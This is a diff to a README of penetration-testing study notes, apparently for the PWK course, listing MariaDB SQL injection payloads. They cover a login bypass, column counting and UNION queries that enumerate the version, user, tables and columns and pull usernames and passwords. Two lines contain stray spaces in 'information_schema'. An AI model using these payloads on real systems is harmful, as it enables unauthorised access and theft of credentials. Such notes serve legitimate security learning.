notsag-dev/pwk/README.md

 - Bypass authentication (hashtag starts a comment for Mariadb): `tom’ or 1=1;#`
 - Adding `LIMIT 1;#` in the end would just fetch one row.
 This may be useful when the login is trying to fetch the user that is logging in, and given that 1=1 is true for all of them it may return several rows.
 Adding the limit keyword it would return just the first one.
 - Get number of columns: add `order by 1` then `order by 2` etc until you get an error to be able to infer the number of columns a table has
+- Once we know the number of columns that are being retrieved in the query, we may want to know which of them are the ones we see in the responses.
+Adding `union all select 1,2,3,..,ncolumns` will display an extra row with the column numbers that are being returned (to detect what we aren't seeing).
+- Get db version: `union all select 1, 2, @@version`
+- Get user: `union all select 1, 2, user()`
+- Get table name: `union all select 1, 2, table_name from information_sc hema.tables`
+- Get column names: `union all select 1, 2, column_name from information_s chema.columns where table_name='users'`
+- Add other query using obtained info: `union all select 1, username, password from users`